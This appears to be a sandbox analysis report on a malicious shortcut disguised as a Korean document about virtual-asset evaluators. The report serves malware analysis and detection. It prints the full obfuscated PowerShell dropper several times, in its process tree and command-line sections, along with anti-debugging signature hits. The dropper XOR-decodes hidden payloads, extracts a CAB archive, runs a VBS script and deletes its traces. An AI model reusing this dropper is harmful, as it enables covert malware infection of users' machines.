Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | May 2, 2025, 8:52 a.m. | May 2, 2025, 8:54 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "DbQWpNgHYB" "C:\Users\test22\AppData\Local\Temp\가상자산 관련 외부평가위원 위촉 안내.hwp.lnk"
3028-
cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function bother{param($result); <#pursue courage#>$access = $result.substring(0,$result.length-4) + ''; <#red left#>return $access;};function emergency{param($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Begin);<#mood which#> $present=$signal*0x01;<#classic professor#> $truth=New''-O''bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Obj''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream=0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream*0x01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m'+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connection); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> return $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; &$naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};function bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contract; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid = bank; <#just partnership#>$team = used -rural $acid;} return $team;};function practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glass access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#>+'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};function used{param($rural); <#enable background#> $severe=''; [System.IO.Directory]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) | <#south text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm#> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = protein;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -protection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy storm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practical;<#write silent#>discourse -orientation <#after glance#> $rare -protection <#violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#controversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>emergency -propose $rare;$size = massive;<#emotional below#>actress -funny $meeting -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kill = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill;" ) )
2216-
cmd.exe C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe
196-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
2364 -
findstr.exe findstr /i rshell.exe
2416
-
-
powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function bother{param($result); <#pursue courage#>$access = $result.substring(0,$result.length-4) + ''; <#red left#>return $access;};function emergency{param($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Begin);<#mood which#> $present=$signal*0x01;<#classic professor#> $truth=New''-O''bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Obj''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream=0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream*0x01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m'+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connection); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> return $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; &$naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};function bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contract; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid = bank; <#just partnership#>$team = used -rural $acid;} return $team;};function practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glass access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#>+'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};function used{param($rural); <#enable background#> $severe=''; [System.IO.Directory]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) | <#south text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm#> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = protein;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -protection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy storm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practical;<#write silent#>discourse -orientation <#after glance#> $rare -protection <#violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#controversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>emergency -propose $rare;$size = massive;<#emotional below#>actress -funny $meeting -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kill = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill;"
1228-
expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\agenda.cab -F:* C:\Users\Public\documents
236
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Local\Temp\가상자산 관련 외부평가위원 위촉 안내.hwp.lnk |
cmdline | C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe " |
cmdline | "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function bother{param($result); <#pursue courage#>$access = $result.substring(0,$result.length-4) + ''; <#red left#>return $access;};function emergency{param($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Begin);<#mood which#> $present=$signal*0x01;<#classic professor#> $truth=New''-O''bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Obj''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream=0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream*0x01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m'+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connection); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> return $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; &$naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};function bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contract; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid = bank; <#just partnership#>$team = used -rural $acid;} return $team;};function practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glass access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#>+'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};function used{param($rural); <#enable background#> $severe=''; [System.IO.Directory]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) | <#south text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm#> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = protein;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -protection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy storm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practical;<#write silent#>discourse -orientation <#after glance#> $rare -protection <#violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#controversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>emergency -propose $rare;$size = massive;<#emotional below#>actress -funny $meeting -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kill = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill;" ) ) |
cmdline | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function bother{param($result); <#pursue courage#>$access = $result.substring(0,$result.length-4) + ''; <#red left#>return $access;};function emergency{param($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Begin);<#mood which#> $present=$signal*0x01;<#classic professor#> $truth=New''-O''bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Obj''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream=0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream*0x01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m'+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connection); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> return $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; &$naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};function bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contract; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid = bank; <#just partnership#>$team = used -rural $acid;} return $team;};function practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glass access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#>+'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};function used{param($rural); <#enable background#> $severe=''; [System.IO.Directory]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) | <#south text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm#> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = protein;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -protection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy storm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practical;<#write silent#>discourse -orientation <#after glance#> $rare -protection <#violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#controversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>emergency -propose $rare;$size = massive;<#emotional below#>actress -funny $meeting -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kill = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill;" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe " |
cmdline | "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function bother{param($result); <#pursue courage#>$access = $result.substring(0,$result.length-4) + ''; <#red left#>return $access;};function emergency{param($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Begin);<#mood which#> $present=$signal*0x01;<#classic professor#> $truth=New''-O''bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Obj''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream=0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream*0x01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m'+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connection); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> return $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; &$naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};function bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contract; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid = bank; <#just partnership#>$team = used -rural $acid;} return $team;};function practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glass access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#>+'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};function used{param($rural); <#enable background#> $severe=''; [System.IO.Directory]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) | <#south text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm#> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = protein;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -protection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy storm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practical;<#write silent#>discourse -orientation <#after glance#> $rare -protection <#violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#controversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>emergency -propose $rare;$size = massive;<#emotional below#>actress -funny $meeting -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kill = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill;" ) ) |
parent_process | powershell.exe | martian_process | "C:\Windows\system32\expand.exe" C:\Users\Public\agenda.cab -F:* C:\Users\Public\documents |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
file | C:\Windows\System32\expand.exe |